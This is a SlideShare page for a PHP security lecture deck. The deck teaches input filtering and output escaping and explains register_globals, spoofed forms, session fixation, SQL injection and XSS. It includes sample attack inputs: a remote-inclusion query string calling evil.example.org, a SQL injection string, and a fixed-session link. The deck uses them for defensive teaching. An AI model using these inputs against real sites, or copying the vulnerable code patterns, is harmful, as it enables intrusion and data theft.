SlideShare a Scribd company logo

12-security.ppt - PHP and Arabic Language - Index

Download as PPT, PDF
W
webhostingguy

The document discusses PHP security best practices. It emphasizes two golden rules: 1) filter all external input and 2) escape all output. It provides examples of filtering user-submitted data and escaping it before displaying or inserting into a database. It also covers common attacks like SQL injection, session fixation, and cross-site scripting, explaining how to prevent them by following the two golden rules of filtering input and escaping output.

1 of 37
Downloaded 55 times
PHP Security
Two Golden Rules FILTER external input Obvious.. $_POST , $_COOKIE , etc. Less obvious.. $_SERVER ESCAPE output Client browser MYSQL database
Two Golden Rules PHP Script Filter Escape Cookie Forms Referer, etc. xhtml MYSQL
Filtering Process by which you inspect data to prove its validity. Adopt a whitelist approach if possible: assume the data is invalid unless you can prove otherwise. Useless unless you can keep up with what has been filtered and what hasn’t…
Filter example $clean = array (); if ( ctype_alnum ($_POST[ 'username' ])) { $clean[ 'username' ] = $_POST[ 'username' ]; }
Filter example $clean = array (); if ( ctype_alnum ($_POST[ 'username' ])) { $clean[ 'username' ] = $_POST[ 'username' ]; } $clean = array (); Initialise an array to store filtered data.
Filter example $clean = array (); if ( ctype_alnum ($_POST[ 'username' ])) { $clean[ 'username' ] = $_POST[ 'username' ]; } if ( ctype_alnum ($_POST[ 'username' ])) Inspect username to make sure that it is alphanumeric.
Filter example $clean = array (); if ( ctype_alnum ($_POST[ 'username' ])) { $clean[ 'username' ] = $_POST[ 'username' ]; } $clean[ 'username' ] = $_POST[ 'username' ]; If it is, store it in the array.
Escaping Output Process by which you escape characters that have a special meaning on a remote system. Unless you’re sending data somewhere unusual, there is probably a function that does this for you.. The two most common outputs are xhtml to the browser (use htmlentities () ) or a MYSQL db (use mysql_real_escape_string () ).
Escape example $xhtml = array (); $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ;
Escape example $xhtml = array (); $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ; $xhtml = array (); Initialize an array for storing escaped data.
Escape example $xhtml = array (); $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ; $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); Escape the filtered username, and store it in the array.
Escape example $xhtml = array (); $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ; echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ; Send the filtered and escaped username to the client.
That’s it! If you follow these rules religiously, you will produce secure code that is hard to break. If you don’t, you will be susceptible to.. Next: COMMON ATTACK METHODS
Register Globals: Eh? All superglobal variable array indexes are available as variable names.. e.g. in your scripts: $_POST[‘name’] is available as $name $_COOKIE[‘age’] is available as $age Most PHP installations have this option turned off , but you should make sure your code is secure if it is turned on.
Register Globals: Example <?php include &quot;$path/script.php&quot; ; ?> If you forget to initialise $path, and have register_globals enabled, the page can be requested with ?path=https%3A%2F%2Fptop.only.wip.la%3A443%2Fhttp%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following: include 'http://evil.example.org/?/script.php' ; i.e. a malicious user can include any script in your code..
Register Globals: Solution Be aware that with register globals on, any user can inject a variable of any name into your PHP scripts. ALWAYS EXPLICITLY INITIALISE YOUR OWN VARIABLES!
Spoofed Forms: Eh? Be aware that anybody can write their own forms and submit them to your PHP scripts. For example, using a select, checkbox or radio button form input does not guarantee that the data submitted will be one of your chosen options…
Spoofed Forms: Example The form written by a web developer to be submitted to a page: <form action=&quot;/process.php&quot; method=&quot;POST&quot;> <select name=&quot;colour&quot;> <option value=&quot;red&quot;>red</option> <option value=&quot;green&quot;>green</option> <option value=&quot;blue&quot;>blue</option> </select> <input type=&quot;submit&quot; /> </form> The user writes their own form to submit to the same page : <form action=&quot;http://example.org/process.php&quot; method=&quot;POST&quot;> <input type=&quot;text&quot; name=&quot;colour&quot; /> <input type=&quot;submit&quot; /> </form>
Spoofed Forms: Solution Users can submit whatever they like to your PHP page… and it will be accepted as long as it conforms to your rules. Make sure all your rules are checked by the PHP external data filter, don’t rely on a form to exert rules for you.. They can be changed!
Session Fixation: Eh? Session attacks nearly always involve impersonation – the malicious user is trying to ‘steal’ someone else’s session on your site. The crucial bit of information to obtain is the session id, and session fixation is a technique of stealing this id.
Session Fixation: Eh? 1. The malicious user hosts a page with links to your site/emails around spam links to your site with a session id already set . … < a href=“http://example.com/index.php ?PHPSESSID=1234 ” …
Session Fixation: Eh? 2. A client follows one of these links and is directed to your site, where they login. 3. Now.. the malicious user knows the session id (he/she set it!), and can ‘hijack’ the session by browsing to your site using the same session id. 4. Malicious user is now logged in as one of your legitimate clients. Ooops.
Session Fixation: Solution To protect against this type of attack, first consider that hijacking a session is only really useful after the user has logged in or otherwise obtained a heightened level of privilege. If we regenerate the session identifier whenever there is any change in privilege level (for example, after verifying a username and password), we will have practically eliminated the risk of a successful session fixation attack.
Session Fixation: Solution session_regenerate_id () Conveniently, PHP has a function that does all the work for you, and regenerates the session id. Regenerate the session id using this function before any change in privilege level.
SQL Injection: Eh? The goal of SQL injection is to insert arbitrary data, most often a database query, into a string that’s eventually executed by the database.
SQL Injection: Example Consider this query executed in PHP on a MYSQL db, where the email text has been submitted from the user: “ SELECT * FROM members WHERE email = ‘ {$_POST[ ‘email’ ]} ’”
SQL Injection: Example The use of $_POST[..] in the query should immediately raise warning flags. Consider if a user submitted the following email: dummy’ OR ‘x’=‘x The query now becomes, SELECT * FROM members WHERE email = ‘ dummy’ OR ‘x’=‘x ’ ..which will return the details of all members!
SQL Injection: Solution Filter input data . Quote your data . If your database allows it (MySQL does), put single quotes around all values in your SQL statements, regardless of the data type. Escape your data . For a MySQL db, use the function mysql_real_escape_string ()
Accessing Credentials Sometimes you need to store sensitive data on your server such as database passwords, usernames, etc. There are various options…
Accessing Credentials Don’t store passwords in an included file without a *.php extension but in a web accessible directory…! You can store in a *.php file under the root (i.e. web accessible). OK, but not great. If your PHP parse engine fails, this data will be on plain view to the entire world. Better , is to keep as much code as possible, including definition of passwords, in included files outside of the web accessible directories. With an Apache server, there are various techniques to include passwords and usernames as environment variables, accessed in PHP by the $_SERVER superglobal. best worst
Cross-Site Scripting (XSS) This is a good example of why you should always escape all output, even for xhtml… echo &quot;<p>Welcome back, {$_GET[ 'username' ]} .</p>&quot; ; echo &quot;<p>Welcome back, <script>...</script> .</p>&quot; ;
XXS: The Solution And again.. Filter input. Escape Output. Be especially careful if you are writing user input to a file, which is later include d into your page.. Without checking, the user can then write their own PHP scripts for inclusion.
The ‘magic’ of PHP Recent versions of PHP have gone some way to tightening security, and one of the newer things is ‘ magic quotes ’. If turned on, this automatically escapes quotation marks and backslashes in any incoming data. Although useful for beginners, it cannot be relied upon if you want to write portable code. http://docs.php.net/en/security.magicquotes.html
The ‘magic’ of PHP: banished! To know where you are starting from, you can use the get_magic_quotes_gpc () function to tell if they are on or off. To start from a consistent point, use stripslashes () to remove any escape characters added by ‘magic quotes’. e.g. if ( get_magic_quotes_gpc ()) { $thing = stripslashes ($_POST[ ‘thing’ ]); }
Phew.. But don’t panic! Open Source PHP code needs to be rock solid in terms of security, as everyone can look through the code. In your bespoke solutions, malicious users will have to try to guess.. Much harder!
Review Filter Input + Escape Output = Secure Code
Ad

Recommended

Php Security3895
Php Security3895Php Security3895
Php Security3895
Aung Khant
 
Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Introduction to PHP Lecture 1
Introduction to PHP Lecture 1
Ajay Khatri
 
PHP Security
PHP SecurityPHP Security
PHP Security
manugoel2003
 
Open Source Package PHP & MySQL
Open Source Package PHP & MySQLOpen Source Package PHP & MySQL
Open Source Package PHP & MySQL
kalaisai
 
Learn php with PSK
Learn php with PSKLearn php with PSK
Learn php with PSK
Prabhjot Singh Kainth
 
Jquery presentation
Jquery presentationJquery presentation
Jquery presentation
guest5d87aa6
 
PHP
PHP PHP
PHP
webhostingguy
 
Building Data Mapper PHP5
Building Data Mapper PHP5Building Data Mapper PHP5
Building Data Mapper PHP5
Vance Lucas
 
What's new, what's hot in PHP 5.3
What's new, what's hot in PHP 5.3What's new, what's hot in PHP 5.3
What's new, what's hot in PHP 5.3
Jeremy Coates
 
Go OO! - Real-life Design Patterns in PHP 5
Go OO! - Real-life Design Patterns in PHP 5Go OO! - Real-life Design Patterns in PHP 5
Go OO! - Real-life Design Patterns in PHP 5
Stephan Schmidt
 
XML and Web Services with PHP5 and PEAR
XML and Web Services with PHP5 and PEARXML and Web Services with PHP5 and PEAR
XML and Web Services with PHP5 and PEAR
Stephan Schmidt
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
webhostingguy
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
Dave Ross
 
Php Tutorials for Beginners
Php Tutorials for BeginnersPhp Tutorials for Beginners
Php Tutorials for Beginners
Vineet Kumar Saini
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
Andrea Valenza
 
Php mysql ppt
Php mysql pptPhp mysql ppt
Php mysql ppt
Karmatechnologies Pvt. Ltd.
 
Class 2 - Introduction to PHP
Class 2 - Introduction to PHPClass 2 - Introduction to PHP
Class 2 - Introduction to PHP
Ahmed Swilam
 
Data Types In PHP
Data Types In PHPData Types In PHP
Data Types In PHP
Mark Niebergall
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using php
Rishabh Srivastava
 
Jquery 4
Jquery 4Jquery 4
Jquery 4
Manish Kumar Singh
 
Solr's Search Relevancy (Understand Solr's query debug)
Solr's Search Relevancy (Understand Solr's query debug)Solr's Search Relevancy (Understand Solr's query debug)
Solr's Search Relevancy (Understand Solr's query debug)
Wongnai
 
FYBSC IT Web Programming Unit III Javascript
FYBSC IT Web Programming Unit III JavascriptFYBSC IT Web Programming Unit III Javascript
FYBSC IT Web Programming Unit III Javascript
Arti Parab Academics
 
Phphacku iitd
Phphacku iitdPhphacku iitd
Phphacku iitd
Sorabh Jain
 
Inroduction to XSLT with PHP4
Inroduction to XSLT with PHP4Inroduction to XSLT with PHP4
Inroduction to XSLT with PHP4
Stephan Schmidt
 
Jsp And Jdbc
Jsp And JdbcJsp And Jdbc
Jsp And Jdbc
Roy Antony Arnold G
 
Php MySql For Beginners
Php MySql For BeginnersPhp MySql For Beginners
Php MySql For Beginners
Priti Solanki
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
Mahmud Ahsan
 
Php security3895
Php security3895Php security3895
Php security3895
PrinceGuru MS
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Website Security
Website SecurityWebsite Security
Website Security
MODxpo
 
Ad

More Related Content

What's hot (18)

What's new, what's hot in PHP 5.3
What's new, what's hot in PHP 5.3What's new, what's hot in PHP 5.3
What's new, what's hot in PHP 5.3
Jeremy Coates
 
Go OO! - Real-life Design Patterns in PHP 5
Go OO! - Real-life Design Patterns in PHP 5Go OO! - Real-life Design Patterns in PHP 5
Go OO! - Real-life Design Patterns in PHP 5
Stephan Schmidt
 
XML and Web Services with PHP5 and PEAR
XML and Web Services with PHP5 and PEARXML and Web Services with PHP5 and PEAR
XML and Web Services with PHP5 and PEAR
Stephan Schmidt
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
webhostingguy
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
Dave Ross
 
Php Tutorials for Beginners
Php Tutorials for BeginnersPhp Tutorials for Beginners
Php Tutorials for Beginners
Vineet Kumar Saini
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
Andrea Valenza
 
Php mysql ppt
Php mysql pptPhp mysql ppt
Php mysql ppt
Karmatechnologies Pvt. Ltd.
 
Class 2 - Introduction to PHP
Class 2 - Introduction to PHPClass 2 - Introduction to PHP
Class 2 - Introduction to PHP
Ahmed Swilam
 
Data Types In PHP
Data Types In PHPData Types In PHP
Data Types In PHP
Mark Niebergall
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using php
Rishabh Srivastava
 
Jquery 4
Jquery 4Jquery 4
Jquery 4
Manish Kumar Singh
 
Solr's Search Relevancy (Understand Solr's query debug)
Solr's Search Relevancy (Understand Solr's query debug)Solr's Search Relevancy (Understand Solr's query debug)
Solr's Search Relevancy (Understand Solr's query debug)
Wongnai
 
FYBSC IT Web Programming Unit III Javascript
FYBSC IT Web Programming Unit III JavascriptFYBSC IT Web Programming Unit III Javascript
FYBSC IT Web Programming Unit III Javascript
Arti Parab Academics
 
Phphacku iitd
Phphacku iitdPhphacku iitd
Phphacku iitd
Sorabh Jain
 
Inroduction to XSLT with PHP4
Inroduction to XSLT with PHP4Inroduction to XSLT with PHP4
Inroduction to XSLT with PHP4
Stephan Schmidt
 
Jsp And Jdbc
Jsp And JdbcJsp And Jdbc
Jsp And Jdbc
Roy Antony Arnold G
 
Php MySql For Beginners
Php MySql For BeginnersPhp MySql For Beginners
Php MySql For Beginners
Priti Solanki
 
What's new, what's hot in PHP 5.3
What's new, what's hot in PHP 5.3What's new, what's hot in PHP 5.3
What's new, what's hot in PHP 5.3
Jeremy Coates
 
Go OO! - Real-life Design Patterns in PHP 5
Go OO! - Real-life Design Patterns in PHP 5Go OO! - Real-life Design Patterns in PHP 5
Go OO! - Real-life Design Patterns in PHP 5
Stephan Schmidt
 
XML and Web Services with PHP5 and PEAR
XML and Web Services with PHP5 and PEARXML and Web Services with PHP5 and PEAR
XML and Web Services with PHP5 and PEAR
Stephan Schmidt
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
webhostingguy
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
Dave Ross
 
Php Tutorials for Beginners
Php Tutorials for BeginnersPhp Tutorials for Beginners
Php Tutorials for Beginners
Vineet Kumar Saini
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
Andrea Valenza
 
Php mysql ppt
Php mysql pptPhp mysql ppt
Php mysql ppt
Karmatechnologies Pvt. Ltd.
 
Class 2 - Introduction to PHP
Class 2 - Introduction to PHPClass 2 - Introduction to PHP
Class 2 - Introduction to PHP
Ahmed Swilam
 
Data Types In PHP
Data Types In PHPData Types In PHP
Data Types In PHP
Mark Niebergall
 
User authentication module using php
User authentication module using phpUser authentication module using php
User authentication module using php
Rishabh Srivastava
 
Jquery 4
Jquery 4Jquery 4
Jquery 4
Manish Kumar Singh
 
Solr's Search Relevancy (Understand Solr's query debug)
Solr's Search Relevancy (Understand Solr's query debug)Solr's Search Relevancy (Understand Solr's query debug)
Solr's Search Relevancy (Understand Solr's query debug)
Wongnai
 
FYBSC IT Web Programming Unit III Javascript
FYBSC IT Web Programming Unit III JavascriptFYBSC IT Web Programming Unit III Javascript
FYBSC IT Web Programming Unit III Javascript
Arti Parab Academics
 
Phphacku iitd
Phphacku iitdPhphacku iitd
Phphacku iitd
Sorabh Jain
 
Inroduction to XSLT with PHP4
Inroduction to XSLT with PHP4Inroduction to XSLT with PHP4
Inroduction to XSLT with PHP4
Stephan Schmidt
 
Jsp And Jdbc
Jsp And JdbcJsp And Jdbc
Jsp And Jdbc
Roy Antony Arnold G
 
Php MySql For Beginners
Php MySql For BeginnersPhp MySql For Beginners
Php MySql For Beginners
Priti Solanki
 

Similar to 12-security.ppt - PHP and Arabic Language - Index (20)

Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
Mahmud Ahsan
 
Php security3895
Php security3895Php security3895
Php security3895
PrinceGuru MS
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Website Security
Website SecurityWebsite Security
Website Security
MODxpo
 
Website Security
Website SecurityWebsite Security
Website Security
Carlos Z
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
Dave Ross
 
secure php
secure phpsecure php
secure php
Riyad Bin Zaman
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
Siddhesh Bhobe
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007
Aung Khant
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
guestbd1cdca
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
Web Security
Web SecurityWeb Security
Web Security
Rene Churchill
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
PHP Security
PHP SecurityPHP Security
PHP Security
Mindfire Solutions
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
OSSCube
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
Aleksandr Yampolskiy
 
Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9
isadorta
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
Compare Infobase Limited
 
P H P Part I I, By Kian
P H P Part I I, By KianP H P Part I I, By Kian
P H P Part I I, By Kian
phelios
 
Concern of Web Application Security
Concern of Web Application SecurityConcern of Web Application Security
Concern of Web Application Security
Mahmud Ahsan
 
Php security3895
Php security3895Php security3895
Php security3895
PrinceGuru MS
 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 1012009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville Web Security 101
brian_dailey
 
Website Security
Website SecurityWebsite Security
Website Security
MODxpo
 
Website Security
Website SecurityWebsite Security
Website Security
Carlos Z
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
Dave Ross
 
secure php
secure phpsecure php
secure php
Riyad Bin Zaman
 
Sql Injection Attacks Siddhesh
Sql Injection Attacks SiddheshSql Injection Attacks Siddhesh
Sql Injection Attacks Siddhesh
Siddhesh Bhobe
 
Php My Sql Security 2007
Php My Sql Security 2007Php My Sql Security 2007
Php My Sql Security 2007
Aung Khant
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
guestbd1cdca
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
jemond
 
Web Security
Web SecurityWeb Security
Web Security
Rene Churchill
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
PHP Security
PHP SecurityPHP Security
PHP Security
Mindfire Solutions
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
OSSCube
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
Aleksandr Yampolskiy
 
Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9Open Source Package Php Mysql 1228203701094763 9
Open Source Package Php Mysql 1228203701094763 9
isadorta
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
Compare Infobase Limited
 
P H P Part I I, By Kian
P H P Part I I, By KianP H P Part I I, By Kian
P H P Part I I, By Kian
phelios
 
Ad

More from webhostingguy (20)

File Upload
File UploadFile Upload
File Upload
webhostingguy
 
Running and Developing Tests with the Apache::Test Framework
Running and Developing Tests with the Apache::Test FrameworkRunning and Developing Tests with the Apache::Test Framework
Running and Developing Tests with the Apache::Test Framework
webhostingguy
 
MySQL and memcached Guide
MySQL and memcached GuideMySQL and memcached Guide
MySQL and memcached Guide
webhostingguy
 
Novell® iChain® 2.3
Novell® iChain® 2.3Novell® iChain® 2.3
Novell® iChain® 2.3
webhostingguy
 
Load-balancing web servers Load-balancing web servers
Load-balancing web servers Load-balancing web serversLoad-balancing web servers Load-balancing web servers
Load-balancing web servers Load-balancing web servers
webhostingguy
 
SQL Server 2008 Consolidation
SQL Server 2008 ConsolidationSQL Server 2008 Consolidation
SQL Server 2008 Consolidation
webhostingguy
 
What is mod_perl?
What is mod_perl?What is mod_perl?
What is mod_perl?
webhostingguy
 
What is mod_perl?
What is mod_perl?What is mod_perl?
What is mod_perl?
webhostingguy
 
Master Service Agreement
Master Service AgreementMaster Service Agreement
Master Service Agreement
webhostingguy
 
Notes8
Notes8Notes8
Notes8
webhostingguy
 
PHP and MySQL PHP Written as a set of CGI binaries in C in ...
PHP and MySQL PHP Written as a set of CGI binaries in C in ...PHP and MySQL PHP Written as a set of CGI binaries in C in ...
PHP and MySQL PHP Written as a set of CGI binaries in C in ...
webhostingguy
 
Dell Reference Architecture Guide Deploying Microsoft® SQL ...
Dell Reference Architecture Guide Deploying Microsoft® SQL ...Dell Reference Architecture Guide Deploying Microsoft® SQL ...
Dell Reference Architecture Guide Deploying Microsoft® SQL ...
webhostingguy
 
Managing Diverse IT Infrastructure
Managing Diverse IT InfrastructureManaging Diverse IT Infrastructure
Managing Diverse IT Infrastructure
webhostingguy
 
Web design for business.ppt
Web design for business.pptWeb design for business.ppt
Web design for business.ppt
webhostingguy
 
IT Power Management Strategy
IT Power Management Strategy IT Power Management Strategy
IT Power Management Strategy
webhostingguy
 
Excel and SQL Quick Tricks for Merchandisers
Excel and SQL Quick Tricks for MerchandisersExcel and SQL Quick Tricks for Merchandisers
Excel and SQL Quick Tricks for Merchandisers
webhostingguy
 
OLUG_xen.ppt
OLUG_xen.pptOLUG_xen.ppt
OLUG_xen.ppt
webhostingguy
 
Parallels Hosting Products
Parallels Hosting ProductsParallels Hosting Products
Parallels Hosting Products
webhostingguy
 
Microsoft PowerPoint presentation 2.175 Mb
Microsoft PowerPoint presentation 2.175 MbMicrosoft PowerPoint presentation 2.175 Mb
Microsoft PowerPoint presentation 2.175 Mb
webhostingguy
 
Reseller's Guide
Reseller's GuideReseller's Guide
Reseller's Guide
webhostingguy
 
File Upload
File UploadFile Upload
File Upload
webhostingguy
 
Running and Developing Tests with the Apache::Test Framework
Running and Developing Tests with the Apache::Test FrameworkRunning and Developing Tests with the Apache::Test Framework
Running and Developing Tests with the Apache::Test Framework
webhostingguy
 
MySQL and memcached Guide
MySQL and memcached GuideMySQL and memcached Guide
MySQL and memcached Guide
webhostingguy
 
Novell® iChain® 2.3
Novell® iChain® 2.3Novell® iChain® 2.3
Novell® iChain® 2.3
webhostingguy
 
Load-balancing web servers Load-balancing web servers
Load-balancing web servers Load-balancing web serversLoad-balancing web servers Load-balancing web servers
Load-balancing web servers Load-balancing web servers
webhostingguy
 
SQL Server 2008 Consolidation
SQL Server 2008 ConsolidationSQL Server 2008 Consolidation
SQL Server 2008 Consolidation
webhostingguy
 
What is mod_perl?
What is mod_perl?What is mod_perl?
What is mod_perl?
webhostingguy
 
What is mod_perl?
What is mod_perl?What is mod_perl?
What is mod_perl?
webhostingguy
 
Master Service Agreement
Master Service AgreementMaster Service Agreement
Master Service Agreement
webhostingguy
 
Notes8
Notes8Notes8
Notes8
webhostingguy
 
PHP and MySQL PHP Written as a set of CGI binaries in C in ...
PHP and MySQL PHP Written as a set of CGI binaries in C in ...PHP and MySQL PHP Written as a set of CGI binaries in C in ...
PHP and MySQL PHP Written as a set of CGI binaries in C in ...
webhostingguy
 
Dell Reference Architecture Guide Deploying Microsoft® SQL ...
Dell Reference Architecture Guide Deploying Microsoft® SQL ...Dell Reference Architecture Guide Deploying Microsoft® SQL ...
Dell Reference Architecture Guide Deploying Microsoft® SQL ...
webhostingguy
 
Managing Diverse IT Infrastructure
Managing Diverse IT InfrastructureManaging Diverse IT Infrastructure
Managing Diverse IT Infrastructure
webhostingguy
 
Web design for business.ppt
Web design for business.pptWeb design for business.ppt
Web design for business.ppt
webhostingguy
 
IT Power Management Strategy
IT Power Management Strategy IT Power Management Strategy
IT Power Management Strategy
webhostingguy
 
Excel and SQL Quick Tricks for Merchandisers
Excel and SQL Quick Tricks for MerchandisersExcel and SQL Quick Tricks for Merchandisers
Excel and SQL Quick Tricks for Merchandisers
webhostingguy
 
OLUG_xen.ppt
OLUG_xen.pptOLUG_xen.ppt
OLUG_xen.ppt
webhostingguy
 
Parallels Hosting Products
Parallels Hosting ProductsParallels Hosting Products
Parallels Hosting Products
webhostingguy
 
Microsoft PowerPoint presentation 2.175 Mb
Microsoft PowerPoint presentation 2.175 MbMicrosoft PowerPoint presentation 2.175 Mb
Microsoft PowerPoint presentation 2.175 Mb
webhostingguy
 
Reseller's Guide
Reseller's GuideReseller's Guide
Reseller's Guide
webhostingguy
 
Ad

12-security.ppt - PHP and Arabic Language - Index

  • 2. Two Golden Rules FILTER external input Obvious.. $_POST , $_COOKIE , etc. Less obvious.. $_SERVER ESCAPE output Client browser MYSQL database
  • 3. Two Golden Rules PHP Script Filter Escape Cookie Forms Referer, etc. xhtml MYSQL
  • 4. Filtering Process by which you inspect data to prove its validity. Adopt a whitelist approach if possible: assume the data is invalid unless you can prove otherwise. Useless unless you can keep up with what has been filtered and what hasn’t…
  • 5. Filter example $clean = array (); if ( ctype_alnum ($_POST[ 'username' ])) { $clean[ 'username' ] = $_POST[ 'username' ]; }
  • 6. Filter example $clean = array (); if ( ctype_alnum ($_POST[ 'username' ])) { $clean[ 'username' ] = $_POST[ 'username' ]; } $clean = array (); Initialise an array to store filtered data.
  • 7. Filter example $clean = array (); if ( ctype_alnum ($_POST[ 'username' ])) { $clean[ 'username' ] = $_POST[ 'username' ]; } if ( ctype_alnum ($_POST[ 'username' ])) Inspect username to make sure that it is alphanumeric.
  • 8. Filter example $clean = array (); if ( ctype_alnum ($_POST[ 'username' ])) { $clean[ 'username' ] = $_POST[ 'username' ]; } $clean[ 'username' ] = $_POST[ 'username' ]; If it is, store it in the array.
  • 9. Escaping Output Process by which you escape characters that have a special meaning on a remote system. Unless you’re sending data somewhere unusual, there is probably a function that does this for you.. The two most common outputs are xhtml to the browser (use htmlentities () ) or a MYSQL db (use mysql_real_escape_string () ).
  • 10. Escape example $xhtml = array (); $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ;
  • 11. Escape example $xhtml = array (); $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ; $xhtml = array (); Initialize an array for storing escaped data.
  • 12. Escape example $xhtml = array (); $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ; $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); Escape the filtered username, and store it in the array.
  • 13. Escape example $xhtml = array (); $xhtml[ 'username' ] = htmlentities ($clean[ 'username' ], ENT_QUOTES , 'UTF-8' ); echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ; echo &quot;<p>Welcome back, {$xhtml[ 'username' ]} .</p>&quot; ; Send the filtered and escaped username to the client.
  • 14. That’s it! If you follow these rules religiously, you will produce secure code that is hard to break. If you don’t, you will be susceptible to.. Next: COMMON ATTACK METHODS
  • 15. Register Globals: Eh? All superglobal variable array indexes are available as variable names.. e.g. in your scripts: $_POST[‘name’] is available as $name $_COOKIE[‘age’] is available as $age Most PHP installations have this option turned off , but you should make sure your code is secure if it is turned on.
  • 16. Register Globals: Example <?php include &quot;$path/script.php&quot; ; ?> If you forget to initialise $path, and have register_globals enabled, the page can be requested with ?path=https%3A%2F%2Fptop.only.wip.la%3A443%2Fhttp%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following: include 'http://evil.example.org/?/script.php' ; i.e. a malicious user can include any script in your code..
  • 17. Register Globals: Solution Be aware that with register globals on, any user can inject a variable of any name into your PHP scripts. ALWAYS EXPLICITLY INITIALISE YOUR OWN VARIABLES!
  • 18. Spoofed Forms: Eh? Be aware that anybody can write their own forms and submit them to your PHP scripts. For example, using a select, checkbox or radio button form input does not guarantee that the data submitted will be one of your chosen options…
